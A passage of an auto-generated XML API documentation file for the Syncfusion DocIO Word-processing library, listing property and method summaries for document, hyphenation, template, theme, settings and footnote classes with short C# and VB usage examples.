            <remarks>This property is not supported in MVC6 and Xamarin platforms.</remarks>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.HTMLImportSettings"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.SaveOptions">
            <summary>
            Gets the document save options. Read-only.
            </summary>
            <value>A <see cref="P:Syncfusion.DocIO.DLS.WordDocument.SaveOptions"/> that represents the save options for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
            <seealso cref="T:Syncfusion.DocIO.DLS.SaveOptions"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.UpdateFields">
            <summary>
            Gets or sets a value indicating whether to update fields in the document.
            </summary>
            <value>if update fields, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ActualFormatType">
            <summary>
            Gets the actual format type of the document which was loaded. While creating new document, it returns FormatType.Doc value. Read-only.
            </summary>
            <value>The file format type of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.FontSubstitutionTable">
            <summary>
            Gets or sets a dictionary collections which represents the font substitution table. The key should be the font name and the value should be the alternate font name.
            </summary>
            <value>The font substitution table contains an alternative font information for missing fonts in the document.</value>
            <example>
            <para>The following code example demonstrates how to specify the alternative font information for missing fonts  in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Apply the Arial font instead of the Arabic font, if the system does not contains Arabic font
                document.FontSubstitutionTable.Add("Arabic", "Arial");
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Apply the Arial font instead of the Arabic font, if the system does not contains Arabic font
                document.FontSubstitutionTable.Add("Arabic", "Arial");
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.HasMacros">
            <summary>
            Gets a value indicating whether the document has macros. Read-only.
            </summary>
            <value>
            <b>True</b> if the document has macros; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.EnablePartialTrustCode">
            <summary>
              Gets or sets a value indicating whether to run the partial trust code.
            </summary>
            <value>
            <b>True</b> if to run partial trust code; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.FFNStringTable">
            <summary>
            Gets/sets FontFamilyNameStringTable 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Images">
            <summary>
            Gets the images.
            </summary>
            <value>The images.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ClonedFields">
            <summary>
            Gets the field stack.
            </summary>
            <value>The field stack.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ListOverrides">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.GrammarSpellingData">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.DOP">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Escher">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.SaveFormatType">
            <summary>
            Gets or sets the type of the save format.
            </summary>
            <value>The type of the save format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.IsMacroEnabled">
            <summary>
            Gets a value indicating whether this instance is macro enabled.
            </summary>
            <value>
            	<c>true</c> if this instance is macro enabled; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.VbaProject">
            <summary>
            Gets or sets the vba project.
            </summary>
            <value>The vba project.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.CustomUIPartContainer">
            <summary>
            Gets or sets the custom UI part container.
            </summary>
            <value>The custom UI part container.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.CustomXMLContainer">
            <summary>
            Gets or sets the custom XML container.
            </summary>
            <value>The custom XML container.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.VbaData">
            <summary>
            Gets or sets the vba data.
            </summary>
            <value>The vba data.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.DocEvents">
            <summary>
            Gets or sets the doc events.
            </summary>
            <value>The doc events.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.MacrosData">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.MacroCommands">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.StandardAsciiFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.StandardFarEastFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.StandardNonFarEastFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.StandardBidiFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Password">
            <summary>
            Gets or Sets the password.
            </summary>
            <value>The password.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.LatentStyles2010">
            <summary>
            Gets or sets document latent styles.
            </summary>
            <value>The latent styles.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.LatentStyles">
            <summary>
            Gets or sets document latent styles.
            </summary>
            <value>The latent styles.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.DocxPackage">
            <summary>
            Gets or sets the docx package.
            </summary>
            <value>The docx package.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ImportStyles">
            <summary>
            Gets or sets a value indicating whether to import styles.
            </summary>
            <value>if import styles, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ImportOption">
            <summary>
            Gets or sets the import option.
            </summary>
            <value>The import option.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.DefCharFormat">
            <summary>
            Gets or sets the default character format.
            </summary>
            <value>The default char format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.DefParaFormat">
            <summary>
            Gets or sets the default paragraph format.
            </summary>
            <value>The default paragraph format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.AssociatedStrings">
            <summary>
            Gets the associated strings.
            </summary>
            <value>The def para format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.IsEncrypted">
            <summary>
            Gets a value indicating whether this instance is encrypted.
            </summary>
            <value>
            	if this instance is encrypted, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.HasPicture">
            <summary>
            Gets a value indicating whether this instance has pictures.
            </summary>
            <value>
            if this instance contains picture, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.WriteWarning">
            <summary>
            Gets a value indicating whether to write evaluation expired warning.
            </summary>
            <value>if write warning, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.WriteProtected">
            <summary>
            Gets or sets a value indicating whether [write protected].
            </summary>
            <value><c>true</c> if [write protected]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.UpdateAlternateChunk">
            <summary>
            Gets or sets a value indicating whether to update Alternate chunk
            </summary>
            <value><c>true</c> update Alternate chunk ; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ListNames">
            <summary>
            Gets the list names.
            </summary>
            <value>The list names.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Lists">
            <summary>
            Gets the list and its level number.
            </summary>
            <value>The lists.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.PreviousListLevel">
            <summary>
            Specifies the previous list level of a list style.
            </summary>
            <value>The lists.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.PreviousListLevelOverrideStyle">
            <summary>
            Specifies the override style name of all the previous lists
            </summary>
            <value>The lists.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.UseHangingIndentAsListTab">
            <summary>
            Specifies whether to use hanging indent as tab stop for lists in Doc to PDF lay outing.
            </summary>
            <value><c>true</c> if use hanging indent as tab stop for lists; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Themes">
            <summary>
            Gets the themes settings of the document.
            </summary>
            <value>The themes.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Settings">
            <summary>
            Gets the compatibility settings of the Word document
            </summary>
            <value>The compatibility settings.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.AlternateChunkCount">
            <summary>
            Gets/ Set the total number of alternate chunk in the document.
            </summary>
            <value>The alternate chunk count.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.CreateBaseStyle">
            <summary>
            Determines whether to create base paragraph style - Normal.
            Handled to avoid repeated looping, while creating base paragraph style - Normal (Recursive call).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.IsNormalStyleDefined">
            <summary>
            Determines whether the Normal style is defined or not.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.IsDefaultParagraphFontStyleDefined">
            <summary>
            Determines whether the DefaultParagraphFont style is defined or not.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.IsHTMLImport">
            <summary>
            Check Whether document is HTML Import to skip cloning of formFields
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.IsSkipFieldDetach">
            <summary>
            Skip  the removing  process for child items from field start to field end 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.IsFieldRangeAdding">
            <summary>
            Gets or sets a value indicating that the field range is adding to the collection
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.IsReadOnly">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.BordersSurroundHeader">
            <summary>
            Gets or sets the value indicating whether to include header in page border
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.BordersSurroundFooter">
            <summary>
            Gets or sets the value indicating whether to include footer in page border
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.DifferentOddAndEvenPages">
            <summary>
            True if the document has different headers and footers 
            for odd-numbered and even-numbered pages. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.WordVersion">
            <summary>
            Gets or sets the word version based on the nFib and nFibNew.
            Value of nFib    Word version
            0x00C0           97 create new document in OS
            0x00C1           97
            0x00C2           97 BIDI build
            0x00D9           2000
            0x0101           2002
            0x010C           2003
            0x0112           2007
            </summary>
            <value>The word version.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.HasTOC">
            <summary>
            Returns Whether the document has Table of Contents or not.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.TOC">
            <summary>
            Returns the TOC element of the word document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.HtmlBaseUrl">
            <summary>
            Gets or sets the Base path which is used to convert the relative path to absolute path.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Fields">
            <summary>
            Gets document fields.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.FloatingItems">
            <summary>
            To hold the all floating items inside the document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.DocxProps">
            <summary>
            Gets not parsed docx properties.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ListStyleNames">
            <summary>
            Gets the list style Names in Docx parser alone
            </summary>
            <value>The list styles.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.HasDocxProps">
            <summary>
            Gets a value indicating whether this instance has docx props.
            </summary>
            <value>
            	if this instance has docx prop, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.IsClosing">
            <summary>
            Indicates whether the document is currently closing.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.StyleNameIds">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.WidgetCollection">
            <summary>
            Gets sub widgets
            <exclude/>
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.SttbfRMark">
            <summary>
            Gets or sets the STTBF r mark.
            </summary>
            <value>
            The STTBF r mark.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocProperties">
            <summary>
            Represents document properties
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocProperties.m_document">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocProperties.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="!:Properties"/> class.
            </summary>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocProperties.SetVersion(Syncfusion.DocIO.DLS.DocumentVersion)">
            <summary>
            Sets the version.
            </summary>
            <param name="version">The version.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocProperties.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocProperties.FormFieldShading">
            <summary>
            Gets or sets a value indicating whether to apply shading on form fields.
            </summary>
            <value><b>True </b>if form field shading is applied, otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocProperties.Version">
            <summary>
            Gets the document version. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.DocumentVersion"/> member that specifies the document version.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocProperties.Hyphenation">
            <summary>
            Gets the hyphenation settings of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Hyphenation"/> that specifies the document hyphenation settings.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Hyphenation">
            <summary>
            Represents Hyphenation settings of the document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyphenation.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Hyphenation"/> class.
            </summary>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyphenation.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyphenation.AutoHyphenation">
            <summary>
            Gets or sets a value indicating whether to hyphenate the document contents automatically. The default is <b>false</b>.
            </summary>
            <value><b>True</b> if to automatically hyphenate the document contents, otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyphenation.HyphenateCaps">
            <summary>
            Gets or sets a value indicating whether to hyphenate words in all capital letters. The default is <b>true</b>.
            </summary>
            <value><b>True</b> if to hyphenate words in all capital letters, otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyphenation.HyphenationZone">
            <summary>
            Gets or sets the amount of whitespace which can be left at the end of a line (or added to justified lines) before hyphenation measured in point.
            </summary>
            <value>A <b>float</b> that specifies the amount of whitespace.</value>
            <remarks>Hyphenation zone must be between 0.05 pt and 1584 pt.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyphenation.ConsecutiveHyphensLimit">
            <summary>
            Gets or sets the maximum number of consecutive lines of text that can end with a hyphen.
            </summary>
            <value>An <b>integer</b> that specifies the number of consecutive lines.</value>
            <remarks>Consecutive hyphens limit must be between 0 and 32767.</remarks>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Template">
            <summary>
            Represents the template document that is attached to the Word document.
            </summary>
            <example>
            <para>The following code example demonstrates how to specify the path for the attached template document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument("Template.docx");
                //Set the path for the attached template document
                document.AttachedTemplate.Path = "../Data/Attachedtemplate.dotm";
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument("Template.docx")
                'Set the path for the attached template document
                document.AttachedTemplate.Path = "../Data/Attachedtemplate.dotm"
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Template.#ctor(Syncfusion.DocIO.DLS.SttbfAssoc)">
            <summary>
            Initializes a new instance of the <see cref="!:AttachedTemplate"/> class.
            </summary>
            <param name="assocStrings">The SttbfAssoc.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Template.Path">
            <summary>
            Gets or sets the path of the attached template document.
            </summary>
            <value>The <b>string</b> that specifies the path to attached template document.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Themes.m_docxProps">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Themes.SchemeColor">
            <summary>
            Gets Scheme Color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Themes.FmtScheme">
            <summary>
            Gets format scheme
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Themes.FontScheme">
            <summary>
            Gets Font Scheme
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Themes.ColorSchemeName">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatScheme.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormatScheme.FmtName">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormatScheme.BgFillFormats">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormatScheme.FillFormats">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormatScheme.LnStyleScheme">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FontScheme">
            <summary>
            Internal class font scheme theme elements
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FontScheme.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FontScheme.FontSchemeName">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FontScheme.MajorFontScheme">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FontScheme.MinorFontScheme">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MajorMinorFontScheme.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MajorMinorFontScheme.FontTypeface">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MajorMinorFontScheme.FontSchemeList">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MajorMinorFontScheme.FontSchemeStructure">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FontSchemeStruct.Name">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FontSchemeStruct.Typeface">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FontSchemeStruct.Charset">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FontSchemeStruct.Panose">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FontSchemeStruct.PitchFamily">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Settings">
            <summary>
            Class represents settings of the document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Settings.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Settings"/> class.
            </summary>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Settings.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Settings.SetCompatibilityMode(Syncfusion.DocIO.DLS.CompatibilityMode)">
            <summary>
            Sets the compatibility mode for the document
            </summary>
            <param name="value"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Settings.CompatibilityOptions">
            <summary>
            Gets the compatibility settings of the document.
            </summary>
            <value>The compatibility settings.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Settings.CompatibilityMode">
            <summary>
            Gets or sets the compatibility mode for the document.
            </summary>
            <value>The compatibility mode.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Settings.CompatibilityModeEnabled">
            <summary>
            Gets or sets the value indicate whether the compatibility Mode enabled while opening the Word document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Settings.MaintainFormattingOnFieldUpdate">
            <summary>
            Gets or sets the value indicates whether to maintain the formatting of the field result during field update. Default value is false. 
            </summary>
            <example>
            <code lang="C#">
            //Load an existing Word document into DocIO instance
            WordDocument document = new WordDocument("Template.docx");
            //Sets the maintain formatting option to the fields of the Word document
            document.Settings.MaintainFormattingOnFieldUpdate = true;
            //Updates the document fields
            document.UpdateDocumentFields();
            //Save and Close the Word document
            document.Save("Sample.docx", FormatType.Docx);
            document.Close();
            </code>
            <code lang="VB">
            'Load an existing Word document into DocIO instance 
            Dim document As New WordDocument("Template.docx")
            'Sets the maintain formatting option to the fields of the Word document
            document.Settings.MaintainFormattingOnFieldUpdate = True
            'Updates the document fields
            document.UpdateDocumentFields()
            'Save and Close the Word document
            document.Save("Sample.docx", FormatType.Docx)
            document.Close()
            </code>
            </example>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CompatibilityOptions">
            <summary>
            Class represents compatibility options of the document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOptions.m_propertiesHash">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOptions.m_document">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CompatibilityOptions.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.CompatibilityOptions"/> class.
            </summary>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CompatibilityOptions.SetValue(Syncfusion.DocIO.DLS.CompatibilityOption,System.Boolean)">
            <summary>
            Sets the CompatibilityOptions based on key.
            </summary>
            <param name="key">The CompatibilityOptions key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CompatibilityOptions.GetValue(Syncfusion.DocIO.DLS.CompatibilityOption)">
            <summary>
            Gets the CompatibilityOptions value based on key.
            </summary>
            <param name="key">The CompatibilityOptions key.</param>       
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CompatibilityOptions.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CompatibilityOptions.Item(Syncfusion.DocIO.DLS.CompatibilityOption)">
            <summary>
            Gets or sets the <see cref="T:System.Boolean"/> with the specified key.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CompatibilityOptions.PropertiesHash">
            <summary>
            Gets the properties hash.
            </summary>
            <value>The properties hash.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MacroData.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.MacroData"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SttbfAssoc.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.SttbfAssoc"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SttbfAssoc.Parse(System.Byte[])">
            <summary>
            Parses the specified associated strings.
            </summary>
            <param name="associatedStrings">The associated strings.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SttbfAssoc.GetAssociatedStrings">
            <summary>
            Gets the associated strings as byte array.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SttbfAssoc.AttachedTemplate">
            <summary>
            Gets or sets the attached template.
            </summary>
            <value>The attached template.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SttbfAssoc.Title">
            <summary>
            Gets or sets the title.
            </summary>
            <value>The title.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SttbfAssoc.Subject">
            <summary>
            Gets or sets the subject.
            </summary>
            <value>The subject.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SttbfAssoc.KeyWords">
            <summary>
            Gets or sets the key words.
            </summary>
            <value>The key words.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SttbfAssoc.Author">
            <summary>
            Gets or sets the author.
            </summary>
            <value>The author.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SttbfAssoc.LastModifiedBy">
            <summary>
            Gets or sets the last modified by.
            </summary>
            <value>The last modified by.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SttbfAssoc.MailMergeDataSource">
            <summary>
            Gets or sets the mail merge data source.
            </summary>
            <value>The mail merge data source.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SttbfAssoc.MailMergeHeaderDocument">
            <summary>
            Gets or sets the mail merge header document.
            </summary>
            <value>The mail merge header document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SttbfAssoc.WritePassword">
            <summary>
            Gets or sets the write password.
            </summary>
            <value>The write password.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Footnote">
             <summary>
             Represents the footnote in the word document.
             </summary>
             <example>
             <para>The following code example demonstrates how to to change the default footnote separator.</para>
             <code lang="C#">
             private void Button1_Click(System.Object sender, System.EventArgs e)
             {
                 //Create a new Word document
                 WordDocument document = new WordDocument();
                 //Create a section
                 IWSection section = document.AddSection();
                 //Add a paragraph to a section
                 IWParagraph paragraph = section.AddParagraph();
                 //Append the text to paragraph
                 paragraph.AppendText("Working with footnotes");
                 //Formatting the text
                 paragraph.ApplyStyle(BuiltinStyle.Heading1);
                 //Add a paragraph to a section
                paragraph = section.AddParagraph();
                //Append the footnotes
                WFootnote footnote = (WFootnote)paragraph.AppendFootnote(Syncfusion.DocIO.FootnoteType.Footnote);
                WTextBody separator = document.Footnotes.Separator;
                //Replace the default foot note separate by text
                separator.Paragraphs[0].Text = "Footnote separator";
                //Set the footnote character format
                footnote.MarkerCharacterFormat.SubSuperScript = SubSuperScript.SuperScript;
                //Inserts the text into the paragraph
                paragraph.AppendText("Sample content for footnotes").CharacterFormat.Bold = true;
                //Add footnote text
                paragraph = footnote.TextBody.AddParagraph();
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
             }
             </code>
             <code lang="VB">
             Private Sub button_Click(sender As Object, e As EventArgs)
            
             End Sub
             </code>
             </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Footnote.m_separator">
            <summary>
            Footnote separator.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Footnote.m_continuationSeparator">
            <summary>
            Footnote continuation Separator.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Footnote.m_continuationNotice">
            <summary>
            Footnote continuation notice.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Footnote.m_ownerDoc">
            <summary>
            The owner Word document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Footnote.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Footnote"/> class.
            </summary>
            <param name="document">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Footnote.#ctor(Syncfusion.DocIO.DLS.Footnote)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Footnote"/> class.
            </summary>
            <param name="footnote">The footnote.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Footnote.Clone">
            <summary>
            Creates a duplicate copy of the current footnote.
            </summary>
            <returns>The cloned <see cref="T:Syncfusion.DocIO.DLS.Footnote"/> object.</returns>
        </member>
